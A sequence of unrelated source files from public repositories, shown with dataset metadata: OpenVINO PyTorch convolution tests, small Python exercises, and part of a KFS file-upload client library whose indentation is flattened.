4b6c1a8e10bab33aaa6629088bb2f48ab5184699 | d2bb13cec7faf28e3d268312298f03c99806bd8b | /calc_tdc_offset/corelli_calc_tdc_offset_func_loop.py | f73d0e5a8641d0c738264885957499cec67aac99 | [] | no_license | rosswhitfield/corelli | 06a91c26556ea788f20f973a1018a56e82a8c09a | d9e47107e3272c4457aa0d2e0732fc0446f54279 | refs/heads/master | 2021-08-07T14:04:24.426151 | 2021-08-03T19:19:05 | 2021-08-03T19:19:05 | 51,771,543 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 175 | py | from corelli_calc_tdc_offset_func import *
for i in range(637,640):
#for i in range(2100,2110):
filename='CORELLI_'+str(i)
results=calc_tdc_offset(filename)
    print(results)
| [
"[email protected]"
] | |
6dfbfef776daceb15fe420c71a7effaf85379b71 | 2ae0b8d95d439ccfd55ea7933ad4a2994ad0f6c5 | /tests/layer_tests/pytorch_tests/test_convnd.py | 8b46b2992d2c072c48f4b6aaa35fbb0cdf2c3517 | [
"Apache-2.0"
] | permissive | openvinotoolkit/openvino | 38ea745a247887a4e14580dbc9fc68005e2149f9 | e4bed7a31c9f00d8afbfcabee3f64f55496ae56a | refs/heads/master | 2023-08-18T03:47:44.572979 | 2023-08-17T21:24:59 | 2023-08-17T21:24:59 | 153,097,643 | 3,953 | 1,492 | Apache-2.0 | 2023-09-14T21:42:24 | 2018-10-15T10:54:40 | C++ | UTF-8 | Python | false | false | 10,460 | py | # Copyright (C) 2018-2023 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import pytest
from openvino.frontend import FrontEndManager
from openvino.frontend.pytorch.ts_decoder import TorchScriptPythonDecoder
from pytorch_layer_test_class import PytorchLayerTest
class TestConv2D(PytorchLayerTest):
def _prepare_input(self):
import numpy as np
return (np.random.randn(2, 3, 25, 25).astype(np.float32),)
def create_model(self, weights_shape, strides, pads, dilations, groups, bias):
import torch
import torch.nn.functional as F
class aten_conv2d(torch.nn.Module):
def __init__(self):
super(aten_conv2d, self).__init__()
self.weight = torch.randn(weights_shape)
self.bias = None
if bias:
self.bias = torch.randn(weights_shape[0])
self.strides = strides
self.pads = pads
self.dilations = dilations
self.groups = groups
def forward(self, x):
return F.conv2d(x, self.weight, self.bias, self.strides, self.pads, self.dilations, self.groups)
ref_net = None
return aten_conv2d(), ref_net, "aten::conv2d"
@pytest.mark.parametrize("params",
[{'weights_shape': [1, 3, 3, 3], 'strides': 1, 'pads': 0, 'dilations': 1, 'groups': 1},
{'weights_shape': [1, 3, 3, 3], 'strides': 2, 'pads': 0, 'dilations': 1, 'groups': 1},
{'weights_shape': [1, 3, 3, 3], 'strides': 1, 'pads': 1, 'dilations': 1, 'groups': 1},
{'weights_shape': [1, 3, 3, 3], 'strides': 1, 'pads': 0, 'dilations': 2, 'groups': 1},
{'weights_shape': [1, 3, 3, 3], 'strides': 1, 'pads': [0, 1], 'dilations': 1,
'groups': 1},
{'weights_shape': [1, 3, 3, 3], 'strides': 1, 'pads': [1, 0], 'dilations': 1,
'groups': 1},
{'weights_shape': [1, 3, 3, 3], 'strides': 1, 'pads': 'same', 'dilations': 1,
'groups': 1},
{'weights_shape': [1, 3, 3, 3], 'strides': 1, 'pads': 'valid', 'dilations': 1,
'groups': 1},
{'weights_shape': [3, 1, 3, 3], 'strides': 1, 'pads': 0, 'dilations': 1, 'groups': 3},
])
@pytest.mark.parametrize("bias", [True, False])
@pytest.mark.nightly
@pytest.mark.precommit
def test_conv2d(self, params, bias, ie_device, precision, ir_version):
self._test(*self.create_model(**params, bias=bias),
ie_device, precision, ir_version)
class TestConv1D(PytorchLayerTest):
def _prepare_input(self):
import numpy as np
return (np.random.randn(2, 3, 25).astype(np.float32),)
def create_model(self, weights_shape, strides, pads, dilations, groups, bias):
import torch
import torch.nn.functional as F
class aten_conv1d(torch.nn.Module):
def __init__(self):
super(aten_conv1d, self).__init__()
self.weight = torch.randn(weights_shape)
self.bias = None
if bias:
self.bias = torch.randn(weights_shape[0])
self.strides = strides
self.pads = pads
self.dilations = dilations
self.groups = groups
def forward(self, x):
return F.conv1d(x, self.weight, self.bias, self.strides, self.pads, self.dilations, self.groups)
ref_net = None
return aten_conv1d(), ref_net, "aten::conv1d"
@pytest.mark.parametrize("params",
[{'weights_shape': [3, 3, 3], 'strides': 1, 'pads': 0, 'dilations': 1, 'groups': 1},
{'weights_shape': [3, 3, 3], 'strides': 2, 'pads': 0, 'dilations': 1, 'groups': 1},
{'weights_shape': [3, 3, 3], 'strides': 1, 'pads': 1, 'dilations': 1, 'groups': 1},
{'weights_shape': [3, 3, 3], 'strides': 1, 'pads': 0, 'dilations': 2, 'groups': 1},
{'weights_shape': [3, 3, 3], 'strides': 1, 'pads': 'same', 'dilations': 1, 'groups': 1},
{'weights_shape': [3, 3, 3], 'strides': 1, 'pads': 'valid', 'dilations': 1, 'groups': 1},
{'weights_shape': [3, 1, 3], 'strides': 1, 'pads': 0, 'dilations': 1, 'groups': 3},
])
@pytest.mark.parametrize("bias", [True, False])
@pytest.mark.nightly
@pytest.mark.precommit
def test_conv1d(self, params, bias, ie_device, precision, ir_version):
self._test(*self.create_model(**params, bias=bias),
ie_device, precision, ir_version)
class TestConv3D(PytorchLayerTest):
def _prepare_input(self):
import numpy as np
return (np.random.randn(2, 3, 25, 25, 25).astype(np.float32),)
def create_model(self, weights_shape, strides, pads, dilations, groups, bias):
import torch
import torch.nn.functional as F
class aten_conv3d(torch.nn.Module):
def __init__(self):
super(aten_conv3d, self).__init__()
self.weight = torch.randn(weights_shape)
self.bias = None
if bias:
self.bias = torch.randn(weights_shape[0])
self.strides = strides
self.pads = pads
self.dilations = dilations
self.groups = groups
def forward(self, x):
return F.conv3d(x, self.weight, self.bias, self.strides, self.pads, self.dilations, self.groups)
ref_net = None
return aten_conv3d(), ref_net, "aten::conv3d"
@pytest.mark.parametrize("params",
[{'weights_shape': [1, 3, 3, 3, 3], 'strides': 1, 'pads': 0, 'dilations': 1, 'groups': 1},
{'weights_shape': [1, 3, 3, 3, 3], 'strides': 2, 'pads': 0, 'dilations': 1, 'groups': 1},
{'weights_shape': [1, 3, 3, 3, 3], 'strides': 1, 'pads': 1, 'dilations': 1, 'groups': 1},
{'weights_shape': [1, 3, 3, 3, 3], 'strides': 1, 'pads': 0, 'dilations': 2, 'groups': 1},
{'weights_shape': [1, 3, 3, 3, 3], 'strides': 1, 'pads': [0, 1, 0], 'dilations': 1,
'groups': 1},
{'weights_shape': [1, 3, 3, 3, 3], 'strides': 1, 'pads': [1, 0, 0], 'dilations': 1,
'groups': 1},
{'weights_shape': [1, 3, 3, 3, 3], 'strides': 1, 'pads': [0, 0, 1], 'dilations': 1,
'groups': 1},
{'weights_shape': [1, 3, 3, 3, 3], 'strides': 1, 'pads': [1, 1, 0], 'dilations': 1,
'groups': 1},
{'weights_shape': [1, 3, 3, 3, 3], 'strides': 1, 'pads': [0, 1, 1], 'dilations': 1,
'groups': 1},
{'weights_shape': [1, 3, 3, 3, 3], 'strides': 1, 'pads': [1, 0, 1], 'dilations': 1,
'groups': 1},
{'weights_shape': [1, 3, 3, 3, 3], 'strides': 1, 'pads': 'same', 'dilations': 1,
'groups': 1},
{'weights_shape': [1, 3, 3, 3, 3], 'strides': 1, 'pads': 'valid', 'dilations': 1,
'groups': 1},
{'weights_shape': [3, 1, 3, 3, 3], 'strides': 1, 'pads': 0, 'dilations': 1, 'groups': 3},
])
@pytest.mark.parametrize("bias", [True, False])
@pytest.mark.nightly
@pytest.mark.precommit
def test_conv3d(self, params, bias, ie_device, precision, ir_version):
self._test(*self.create_model(**params, bias=bias),
ie_device, precision, ir_version)
class TestConv2DInSubgraph(PytorchLayerTest):
def _prepare_input(self):
import numpy as np
return (np.random.randn(2, 3, 25, 25).astype(np.float32), np.array([1], dtype=np.int32))
def convert_directly_via_frontend(self, model, example_input, trace_model, dynamic_shapes, ov_inputs, freeze_model):
        # Override the base implementation to allow reproducing an issue caused by the additional freeze.
import torch
fe_manager = FrontEndManager()
fe = fe_manager.load_by_framework('pytorch')
model.eval()
with torch.no_grad():
if trace_model:
model = torch.jit.trace(model, example_input)
else:
model = torch.jit.script(model)
model = torch.jit.freeze(model)
print(model.inlined_graph)
decoder = TorchScriptPythonDecoder(model)
im = fe.load(decoder)
om = fe.convert(im)
self._resolve_input_shape_dtype(om, ov_inputs, dynamic_shapes)
return model, om
def create_model(self):
import torch
from torchvision.ops import Conv2dNormActivation
class aten_conv2d(torch.nn.Module):
def __init__(self):
super().__init__()
convs = []
conv_depth=2
for _ in range(conv_depth):
convs.append(Conv2dNormActivation(3, 3, 3, norm_layer=None))
self.convs = torch.nn.Sequential(*convs)
for layer in self.modules():
if isinstance(layer, torch.nn.Conv2d):
torch.nn.init.normal_(layer.weight) # type: ignore[arg-type]
torch.nn.init.constant_(layer.bias, 0) # type: ignore[arg-type]
def forward(self, x, y):
acc = self.convs(x)
if y:
acc += self.convs(x)
return acc
ref_net = None
return aten_conv2d(), ref_net, "aten::conv2d"
@pytest.mark.nightly
@pytest.mark.precommit
def test_conv2d(self, ie_device, precision, ir_version):
self._test(*self.create_model(),
ie_device, precision, ir_version, freeze_model=True, dynamic_shapes=False)
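# A typical local invocation, assuming the shared OpenVINO layer-test
# conftest provides the ie_device/precision fixtures:
#
#     pytest test_convnd.py -m precommit -k conv2d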
| [
"[email protected]"
] | |
082ae04a5c36262e14182602b53ff46f5aa16fcf | 1f08436bab6cd03bcfb257e8e49405cbc265195a | /8_function/Sample/functions_ex3.py | 0b362e6fc10e31311f529f7db4e12747dd2833cc | [] | no_license | kuchunbk/PythonBasic | e3ba6322f256d577e37deff09c814c3a374b93b2 | a87135d7a98be8830d30acd750d84bcbf777280b | refs/heads/master | 2020-03-10T04:28:42.947308 | 2018-04-17T04:25:51 | 2018-04-17T04:25:51 | 129,192,997 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 287 | py | '''Question:
Write a Python function to multiply all the numbers in a list.
'''
# Python code:
def multiply(numbers):
total = 1
for x in numbers:
total *= x
return total
print(multiply((8, 2, 3, -1, 7)))
'''Output sample:
-336
''' | [
"[email protected]"
] | |
1bee663d7c4ec53d0aae190aa76827e89a0ec34e | b65032c8b76dd2115fd37ae45669a44537ad9df4 | /Code/dictionary_words.py | a1ae64f3596492ec99008c0aa807de8a02d24fd2 | [] | no_license | reikamoon/CS-1.2-Intro-Data-Structures | a795dc8ca9e52f02cafb9d0782a80632bcc7b206 | 40b19ad8d93631bbdbd589fa95b0b3a7ec40b53a | refs/heads/master | 2022-12-22T00:22:05.667638 | 2019-12-11T20:45:11 | 2019-12-11T20:45:11 | 220,103,212 | 0 | 0 | null | 2022-12-08T06:16:43 | 2019-11-06T22:35:08 | Python | UTF-8 | Python | false | false | 642 | py | from random import randint
from os import sys
def get_words():
words = list()
with open('/usr/share/dict/words', 'r') as f:
words = f.read().split('\n')
return words
def random_words(integer_input, word_list):
    # Build a sentence of `integer_input` random words drawn from word_list.
    sentence = str()
    print("My Random Sentence:")
    while integer_input > 0:
        index = randint(0, len(word_list) - 1)
        sentence += word_list[index] + ' '
        integer_input -= 1
    return sentence
if __name__ == '__main__':
words = get_words()
integer_input = int(sys.argv[1])
print(random_words(integer_input, words))
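# Example invocation (the word count comes from the first CLI argument):
#
#     python dictionary_words.py 5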
| [
"[email protected]"
] | |
86ddec28dee78756b57aa131bc70d9140872cc04 | 08c5ee41d40f9f14a3c6c3cb48515ed8467845e3 | /python/kfs_lib.py | 6c10b5ce828b790d815030153018533c82f3b5b2 | [
"Apache-2.0"
] | permissive | fdgonthier/kas | 3f971bda691b8c6db7a6343ea419088d1ac10386 | c82a3723085cdd9fec25efca1209e62db09edd72 | refs/heads/master | 2021-01-17T21:38:07.362287 | 2013-08-14T20:54:08 | 2013-08-14T20:54:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,451 | py | import os, ConfigParser, hashlib, stat, struct, logging
# from kpython
import kbase
from kpg import *
from StringIO import StringIO
# local
import kanp
import kcd_client
from kcdpg import KCD_KWS_LOGIN_TYPE_KWMO
# KFS Constants.
KFS_CHUNK_SIZE = 256 * 1024
KFS_FILE = 1
KFS_DIR = 2
KFS_NODE_TYPES = [KFS_FILE, KFS_DIR]
KFS_STATUS_PENDING = 0
KFS_STATUS_OK = 1
KFS_STATUS_DELETED = 2
KFS_STATUSES = [KFS_STATUS_PENDING, KFS_STATUS_OK, KFS_STATUS_DELETED]
KFS_ROOT_INODE_ID = 0
KFS_ROOT_COMMIT_ID = 0
# Put after imports so log is not overridden by an imported module.
log = logging.getLogger(__name__)
# Replace bad characters in a skurl email subject for directory creation.
def get_kfs_skurl_escaped_subject(s, replacement_char='_'):
allowed_chars = [
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1
]
new_s = ''
for c in s:
if allowed_chars[ord(c)] == 1:
new_s += c
else:
new_s += replacement_char
return new_s
# Convert a skurl email subject into a valid KFS directory.
def get_kfs_skurl_subject(date, subject):
d = time.strftime('%Y-%m-%d %Hh%Mm%S', time.gmtime(date))
if subject == '':
s = 'No subject'
else:
s = get_kfs_skurl_escaped_subject(subject)
s = s.strip()
return d + ' ' + s;
# This checks path and replace characters when needed so that the result is valid.
def kfs_convert_path_name(path_name):
invalid_words = [
"", "CON", "PRN", "AUX", "NUL", "COM1", "COM2", "COM3", "COM4", "COM5",
"COM6", "COM7", "COM8", "COM9", "LPT1", "LPT2", "LPT3", "LPT4",
"LPT5", "LPT6", "LPT7", "LPT8", "LPT9"
]
allowed_chars = [
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1
]
new_str = ""
# Replace "#".
path_name = path_name.replace("#", "#%03i" % ( ord("#") ) )
# Replace bad words. Return immediately the converted string if a bad word is found.
for invalid_word in invalid_words:
if path_name == invalid_word:
for char in path_name:
new_str += "#%03i" % ( ord(char) )
return new_str
# Replace bad characters.
for char in path_name:
if allowed_chars[ord(char)]:
new_str += char
else:
new_str += "#%03i" % ( ord(char) )
# Replace bad leading characters.
char = new_str[0:1]
if char == " ":
new_str = new_str[1:] + "#%03i" % ( ord(char) )
# Replace bad trailing characters.
char = new_str[-1:]
if char == ".":
new_str = new_str[:-1] + "#%03i" % ( ord(char) )
return new_str
# This class represents a Web KFS node.
class WebKFSNode(kbase.PropStore):
def __init__(self, workspace_id=None, share_id=None, inode_id=None):
self.workspace_id = workspace_id
self.share_id = share_id
self.inode_id = inode_id
def from_dict(self, d):
self.workspace_id = d['workspace_id']
self.share_id = d['share_id']
self.inode_id = d['inode_id']
return self
def __str__(self):
return "<%s ws_id=%s share_id=%s inode_id=%s>" % \
( self.__class__.__name__, str(self.workspace_id), str(self.share_id), str(self.inode_id) )
# This class represents a Web KFS directory.
class WebKFSDirectory(WebKFSNode):
pass
# This class represents a Web KFS file.
class WebKFSFile(WebKFSNode):
pass
# Represent a directory to delete (new style)
class KFSOpDirDelete(object):
# Accessible attributes
__slots__ = ['kfs_op', 'inode_id', 'commit_id', 'kfs_error']
def __init__(self, inode_id, commit_id):
self.kfs_op = kanp.KANP_KFS_OP_DELETE_DIR
self.inode_id = inode_id
self.commit_id = commit_id
self.kfs_error = None
# Represent a file to delete (new style).
class KFSOpFileDelete(object):
# Accessible attributes
__slots__ = ['kfs_op', 'inode_id', 'commit_id', 'kfs_error']
def __init__(self, inode_id, commit_id):
self.kfs_op = kanp.KANP_KFS_OP_DELETE_FILE
self.inode_id = inode_id
self.commit_id = commit_id
self.kfs_error = None
# NOT USED #
if 0:
# This class represents a KFS directory.
class KFSDirectory(kbase.PropStore):
def __init__(self):
self.workspace_id = 0
self.share_id = 0
self.inode = 0
self.parent_inode_id = 0
self.commit_id = 0
self.user_id = 0
self.date = 0
self.name = ''
self.kfs_error = None
# This class represents a KFS file.
class KFSFile(kbase.PropStore):
def __init__(self):
self.workspace_id = 0
self.share_id = 0
self.inode = 0
self.parent_inode_id = 0
self.commit_id = 0
self.user_id = 0
self.date = 0
self.size = 0
self.hash = None
self.name = ''
# NOT USED #
if 0:
# This class handles writing to a file.
class KFSFileWriter(object):
def __init__(self, file_path):
self._fd = None
self.file_path = file_path
log.debug("%s: instantiated with file path '%s'." % ( self.__class__.__name__, self.file_path ))
def open(self):
self._fd = os.open(self.file_path, os.O_RDWR|os.O_CREAT)
log.debug("%s: opened file '%s'." % ( self.__class__.__name__, self.file_path ))
def write(self, data):
os.write(self._fd, data)
# Do not uncomment!
#log.debug("%s: writing file %i bytes." % ( self.__class__.__name__, len(data) ))
def close(self):
os.close(self._fd)
log.debug("%s: closed file '%s'." % ( self.__class__.__name__, self.file_path ))
# This class represents a KFS uploaded file.
class KFSUploadFile(KFSFile):
def __init__(self):
KFSFile.__init__(self)
self.kfs_op = None
self.fd = None
self.chunks = []
self.kfs_error = None
# This method sets some attributes based on an open file descriptor.
def set_from_fd(self, fd, size=None):
self.chunks = []
# Get hash of file.
self.hash = "X"*16 #kfs_compute_hash(fd)
# Set fd and size.
self.fd = fd
self.size = size
if not size: self.size = os.fstat(fd)[stat.ST_SIZE]
# Virtually split the file in chunks.
offset=0
while offset < self.size:
remaining_bytes = self.size - offset
size = min(remaining_bytes, KFS_CHUNK_SIZE)
self.chunks += [KFSChunk(self.fd, offset, size)]
offset += size
# NOT USED #
if 0:
# This class represents a KFS downloaded file.
class KFSDownloadFile(KFSFile):
def __init__(self):
KFSFile.__init__(self)
self.hash = None
self.comm = None
self.kfs_error = None
# This class represents a KFS chunk.
class KFSChunk(object):
def __init__(self, fd, offset, size):
self.fd = fd
self.offset = offset
self.size = size
def read(self):
os.lseek(self.fd, self.offset, os.SEEK_SET)
s = ''
cur = 0
while cur < self.size:
remaining_bytes = self.size - cur
d = os.read(self.fd, remaining_bytes)
cur += len(d)
s += d
return s
def __repr__(self):
return "<%s fd=%i offset=%i size=%i>" % ( self.__class__.__name__, self.fd, self.offset, self.size )
class PhaseTwoCommitSubMessage(object):
def __init__(self):
self.size = 0
self.anpm = None
class PhaseTwoChunkSubMessage(object):
def __init__(self):
self.size = 0
self.anpm = None
self.chunk = None
class PhaseTwoMessage(object):
def __init__(self):
self.size = 0
self.sub_messages = []
self.anpm = None
# This class handles KFS operations like creating and updating files in KCD.
class KFSOperations(object):
def __init__(self, kfs_entries, reader, writer):
self.kfs_entries = kfs_entries
self.reader = reader
self.writer = writer
self.phase_two_messages = []
# Allows creating and updating files (need phase 2) or creating directories.
def phase_one(self, email_id, ticket):
# Prepare phase one ANP message.
m = kanp.ANP_msg()
m.add_bin(ticket)
m.add_u64(email_id)
m.add_u32(len(self.kfs_entries))
for kfs_entry in self.kfs_entries:
if kfs_entry.kfs_op == kanp.KANP_KFS_OP_CREATE_FILE:
m.add_u32(5) # nb of elements
m.add_u32(kfs_entry.kfs_op)
m.add_u64(kfs_entry.parent_inode_id)
m.add_u64(kfs_entry.parent_commit_id)
m.add_str(kfs_entry.name)
elif kfs_entry.kfs_op == kanp.KANP_KFS_OP_UPDATE_FILE:
m.add_u32(4) # nb of elements
m.add_u32(kfs_entry.kfs_op)
m.add_u64(kfs_entry.inode)
m.add_u64(kfs_entry.commit_id)
elif kfs_entry.kfs_op == kanp.KANP_KFS_OP_CREATE_DIR:
m.add_u32(5) # nb of elements
m.add_u32(kfs_entry.kfs_op)
m.add_u64(kfs_entry.parent_inode_id)
m.add_u64(kfs_entry.parent_commit_id)
m.add_str(kfs_entry.name)
elif kfs_entry.kfs_op == kanp.KANP_KFS_OP_DELETE_DIR:
m.add_u32(4) # nb of elements
m.add_u32(kfs_entry.kfs_op)
m.add_u64(kfs_entry.inode_id)
m.add_u64(kfs_entry.commit_id)
elif kfs_entry.kfs_op == kanp.KANP_KFS_OP_DELETE_FILE:
m.add_u32(4) # nb of elements
m.add_u32(kfs_entry.kfs_op)
m.add_u64(kfs_entry.inode_id)
m.add_u64(kfs_entry.commit_id)
else:
raise Exception("Unexpected KFS operation: '%s'." % ( str(kfs_entry.kfs_op) ) )
# Send phase one ANP message to KCD.
payload = m.get_payload()
self.writer.send_command_header(kanp.KANP_CMD_KFS_PHASE_1, len(payload))
self.writer.write(payload)
log.debug("Phase 1 data sent.")
# Get phase one result.
h, m = kanp.get_anpt_all(self.reader)
if h.type != kanp.KANP_RES_KFS_PHASE_1:
assert h.type == kanp.KANP_RES_FAIL
raise kanp.KANPFailure(m.get_u32(), m.get_str())
log.debug("Got phase 1 reply.")
# Handle phase one reply.
phase_two_needed = False
commit_id = m.get_u64()
nb_op = m.get_u32()
assert nb_op == len(self.kfs_entries)
for i in range(0, nb_op):
errno = m.get_u32()
error = m.get_str()
if error:
log.debug(
"Phase 1: KFS operation %i error: errno=%i, error='%s'" % \
( i, errno, error ))
self.kfs_entries[i].kfs_error = error
# This function prepares anp messages and sub-messages for phase_two().
# Knowing in advance the size of the files is needed for this function. See other methods for asynchronous uploads.
# NOTE: No longer used, might not be fully working.
def prepare_phase_two(self):
message = None
files_iter = iter(self.kfs_entries)
switch_file = True
switch_message = True
commit_file = False
switch_chunk = True
exit = False
while 1:
if exit or switch_message:
switch_message = False
if message and len(message.sub_messages) > 0:
# Finish ANPT message preparation.
message.anpm = kanp.ANP_msg()
message.anpm.add_u32(len(message.sub_messages))
message.size += message.anpm.get_payload_size()
# Append ANPT message to list.
self.phase_two_messages.append(message)
# Init new ANPT message.
message = PhaseTwoMessage()
if exit:
break
if commit_file:
commit_file = False
# Prepare a file commit sub-message.
log.debug("Committing file.")
# Prepare a partial anp message (missing an ANP bin field for the MD5 signature of the file).
subm = PhaseTwoCommitSubMessage()
subm.anpm = kanp.ANP_msg()
subm.anpm.add_u32(3)
subm.anpm.add_u32(kanp.KANP_KFS_SUBMESSAGE_COMMIT)
#hash = kfs_compute_hash(kfs_entry.fd)
#subm.anpm.add_bin(kfs_entry.hash)
# Calculate total sub-message size.
subm.size = subm.anpm.get_payload_size() + 5 + 16 # partial anp mesg + anp bin header + md5 sign.
log.debug("Commit sub-message has %i bytes in total." % ( subm.size ))
# Append sub-message to current ANPT message.
log.debug("Appending commit sub-message to ANPT message.")
message.sub_messages.append(subm)
message.size += subm.size
# Switch to next file.
switch_file = True
continue
if not message:
# Init new message.
log.debug("Initiating a new message.")
message = PhaseTwoMessage()
if switch_file:
switch_file = False
try:
# Get next file.
kfs_entry = files_iter.next()
log.debug("Got new file: '%s'." % ( kfs_entry.name ))
# Start again with file chunk.
chunks_iter = iter(kfs_entry.chunks)
switch_chunk = True
continue
except StopIteration:
# No more file in list.
log.debug("No more file.")
exit = True
continue
if kfs_entry.kfs_op != kanp.KANP_KFS_OP_CREATE_FILE and kfs_entry.kfs_op != kanp.KANP_KFS_OP_UPDATE_FILE:
                # That operation does not need any phase 2 message.
log.debug("No phase two needed for that operation.")
switch_file = True
continue
if kfs_entry.kfs_error:
# This file cannot be uploaded. Pass to next file.
log.debug("Skipping file '%s' because it had an error in phase 1: '%s'." % \
(kfs_entry.name, kfs_entry.kfs_error ))
switch_file = True
continue
if switch_chunk:
switch_chunk = False
try:
# Get next KFS file chunk.
chunk = chunks_iter.next()
log.debug("Got a new chunk of %i bytes." % ( chunk.size ))
except StopIteration:
# No more chunks. Commit file.
commit_file = True
continue
# Add chunk to current ANPT message.
# Prepare a partial anp message (missing an ANP bin field for the chunk data).
subm = PhaseTwoChunkSubMessage()
subm.anpm = kanp.ANP_msg()
subm.anpm.add_u32(3)
subm.anpm.add_u32(kanp.KANP_KFS_SUBMESSAGE_CHUNK)
#subm.anpm.add_bin(chunk.read())
# Set sub-message chunk.
subm.chunk = chunk
# Calculate total sub-message size.
subm.size = subm.anpm.get_payload_size() + 5 + chunk.size # partial anp mesg + anp bin header + chunk data
log.debug("Chunk sub-message has %i bytes in total." % ( subm.size ))
if (message.size + subm.size + 100000) > kanp.ANPT_MSG_MAX_SIZE:
# Current ANPT message cannot accept chunk.
# Switch ANPT message.
switch_message = True
# Do not switch chunk (implicit).
#switch_chunk = False
continue
# Append sub-message to this message.
log.debug("Appending chunk sub-message to ANPT message.")
message.sub_messages.append(subm)
message.size += subm.size
switch_chunk = True
# This function handles the phase two communications, after messages are prepared in prepare_phase_two().
# NOTE: No longer used, might not be fully working.
def phase_two(self):
hash = None
i = -1
for message in self.phase_two_messages:
i += 1
# Sent ANP transport header
log.debug("Phase 2: sending ANPT header %i, size %i." % ( i, message.size ))
self.writer.send_command_header(kanp.KANP_CMD_KFS_PHASE_2, message.size)
log.debug("Phase 2: sent ANPT header %i, size %i." % ( i, message.size ))
# Send base message anp message.
kanp.send_anpt_msg(self.writer, message.anpm)
if not hash:
hash = hashlib.md5()
j = -1
for subm in message.sub_messages:
j += 1
if isinstance(subm, PhaseTwoChunkSubMessage):
# send chunk
log.debug("Phase 2: preparing file %i chunk %i anp message." % ( i, j ))
bytes = subm.chunk.read()
hash.update(bytes)
subm.anpm.add_bin(bytes)
log.debug("Phase 2: sending file %i chunk %i anp message." % ( i, j ))
kanp.send_anpt_msg(self.writer, subm.anpm)
log.debug("Phase 2: sent file %i chunk %i anp message." % ( i, j ))
else:
assert isinstance(subm, PhaseTwoCommitSubMessage)
# send commit
log.debug("Phase 2: preparing file %i commit anp message." % ( i ))
bytes = hash.digest()
subm.anpm.add_bin(bytes)
hash = hashlib.md5()
log.debug("Phase 2: sending file %i commit anp message." % ( i ))
kanp.send_anpt_msg(self.writer, subm.anpm)
log.debug("Phase 2: sent file %i commit anp message." % ( i ))
# get response
log.debug("Phase 2: getting %i reply." % ( i ))
h, m = kanp.get_anpt_all(self.reader)
log.debug("Phase 2: got %i reply." % ( i ))
if h.type == kanp.KANP_RES_FAIL:
raise kanp.KANPFailure(m.get_u32(), m.get_str())
assert h.type == kanp.KANP_RES_OK
# get response
h, m = kanp.get_anpt_all(self.reader)
log.debug("Phase 2: got final reply.")
if h.type == kanp.KANP_RES_FAIL:
raise kanp.KANPFailure(m.get_u32(), m.get_str())
assert h.type == kanp.KANP_RES_OK
log.debug("File upload finished.")
#return kfs_entries
# Create a phase 2 chunk sub-message.
def phase_2_create_chunk_submessage(self, data):
# Prepare anp message
subm = PhaseTwoChunkSubMessage()
subm.anpm = kanp.ANP_msg()
subm.anpm.add_u32(3)
subm.anpm.add_u32(kanp.KANP_KFS_SUBMESSAGE_CHUNK)
subm.anpm.add_bin(data)
return subm
# Create a phase 2 commit sub-message.
def phase_2_create_commit_submessage(self, hash):
subm = PhaseTwoCommitSubMessage()
subm.anpm = kanp.ANP_msg()
subm.anpm.add_u32(3)
subm.anpm.add_u32(kanp.KANP_KFS_SUBMESSAGE_COMMIT)
subm.anpm.add_bin(hash)
return subm
# Send a phase 2 message with only 1 submessage
# (for asynchronous uploads when file(s) size(s) is/are not yet known...).
def phase_2_send_message_with_one_submessage(self, subm):
# Prepare ANP message.
message = PhaseTwoMessage()
message.anpm = kanp.ANP_msg()
